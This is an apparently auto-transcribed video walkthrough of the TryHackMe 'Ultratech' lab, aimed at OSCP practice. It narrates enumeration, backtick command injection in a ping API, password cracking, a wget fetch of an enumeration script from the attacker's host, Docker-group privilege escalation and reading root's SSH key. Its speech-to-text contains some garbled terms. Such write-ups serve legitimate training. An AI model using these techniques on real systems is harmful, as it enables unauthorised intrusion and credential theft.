Hello guys, welcome to OneHub. Today we're going to talk about Ultratech, and this machine is for enumeration and Docker privilege escalation. And we have an unusual port open in this machine. Let's see what's in here. Let's move to our working folder. Okay, so as always, we'll start with the nmap. A is for OS detection. Ultratech.txt. Ultratech.thm. Okay, so this will give you the nmap output, which I already have here. So I'll get that out. So there are FTP SSH ports open and 8081 port open. So let's run GoBuster on 8081. We'll run a sudo GoBuster. And user share word list and its directory buster common.txt. Okay. Okay, so we'll have to specify the port. Port is 8081. So we'll see what's running in port 8081. Okay, there is nothing in here. We'll see the page source. No. Okay. So VSFPTT 3.0.3 is of no use. Like there is no public exploit for that port, and SSH will come back to it later. So okay, so there is something which is called author. We'll go and see what's here. Okay, so we don't know the login credentials. So I tried many things like and no login like this one, and this didn't work. Okay, invalid credentials it seems. Okay, so this didn't work. What are the other things? So one tip for OSCP which I can give you is there is a tool called auto recon if you don't know it previously, and this will give you, this takes a lot of time to run, 20-30 minutes, but it gives you the information that you may miss. So let it run in the background meanwhile you enumerate manually. And with this tool I found that there is a port running on 31331. And yeah, so I'll also tell you where this the results of the auto recon will be. So I'll move to the working folder. So that's where I ran my auto recon. So it creates the own folder structure there. So Tryhackme and the Ultratech, and this is where, and this is the folder that I ran my auto recon. So it will save in results ultratech.thm, and yes, so there are 4 folders here, and I didn't see much things in exploit, loot, and report. You may find occasionally, but most of the things are in scans. So you should move to scans and see. Okay, so here and this has a full list of what tools were run on which port. Yes, so 31331 Nikto was run, Nmap was run. There is something called robots.txt. Let's see what robots.txt can give us. Okay, so there is okay you take sitemap.txt and okay, index.html, bot.html, partners.html. Let's run one by one. Okay, so there is a login area here to which we don't have a password again, and we'll see if we get anything out of here. So that is all, and there are two JS files. Okay, this is min.js, this is api.js. Okay, so what is it saying? It's getting the window.location here, and it's trying to ping something here. There is a new location that we've got is ping, and with that it is trying to send it to auth. So let's see if it is working for us. Okay, so I'll take this URL first, and I'll construct my own using Pluma. This is ultratech.thm. It's to 8081 because here we have 8081, so that is why I'm trying to ping through 8081, and IP is, so we'll send it to 127.0.0.1. Okay, so yeah, it looks like we are getting some information. It's great. Okay, so can we do a semicolon and do ID? No, we cannot do that. So what else can we do? Okay, you can try a lot of things here, but there is a there is a code here. So if you want to in command line, if you want to execute anything as priority, you use this uh, backcode here. Backcode key is situated right below your escape key, and if you give anything here, and this is the first one to execute in spite being on if you're pinging something. Okay, so if you give 127.0.1 0.1, the ID gets executed first and then the next. So the priority gets reversed if you use this character. So let's try this from here. ID. Okay, so yeah, so we are getting a response. So this belongs to a group www, and yes, so we'll see what's in this folder here. Okay, we have uh, Escalate DB here. Okay, let's cat that out. Okay, Great. We have two passwords, and if you have observed in this in this 3331, if you have done the enumeration right, you might have seen this root. So this may be a user, and let's try. Okay, so here we have a root R00T user, and okay, we'll try to crack this hash extension. I'm pretty bad at it. I don't find any steps. Skip. Okay, so we've got great. So this is the password for the user R00T, and let's try to SSH from here. SSH R00T at Ultratech. Okay, so we were able to log in. Yes, great. ID. Okay, ID is ROOT. Observe that we are also a part of a Docker group, and okay, this Ubuntu machine running here. Let's move to temp. Okay, we'll pull in an exploit suggestor here. CD to transfer. Okay, so I'll run a server from here to pull all the files. So wget http 10.9.146.142 and port is 8000 lin.sh. Okay, we should run chmod to for us to execute lin.sh. Okay, so there are three users: binbash, one is an root user, one is a ww, and one is root. Okay, I've tried to cat this out. It's not successful. And so what is the requirement for Tryhackme here? What is the file name? File name was Ultratech. Escalate. User's password hash. Okay, have it here. And the password that we cracked is this one. Yes. Yes. Great. And you should be able to be comfortably run the commands. Okay, so we need to find the private SSH key for the root user. Let's see if we can get through. Okay, so cron top, nothing's in here. What do we have? Okay, so we are a part of Docker group, and let's see we can do anything about it. Great. So we have a Docker group running, and let's see if we have any public exploit for that. Bins Docker. Okay, and no, this won't work because Alpine does not exist in this machine, but whereas Bash exists. So we'll try and remove Bash. We'll try and remove Alpine. It should work. ID. What happened? Then work. So initially it didn't work, and then went again, and I tried few times. I changed it to Bash, and it worked. So now the ID is root, and so in order to finish this box, let's see what should we do. We should get the first 9 characters of the root. Yes, let's cd to root, and we have, yes, .ssh folder here, and we need to look at IDRSA. Let's cat out that IDRSA. I don't know how many words are there. First 9 characters, is it? Okay. Yes, we are done with this box. So people who are preparing for OSCP, I am daily publishing 1 video a day. Please subscribe to this channel to get notified to all the videos that I post. Thank you for watching.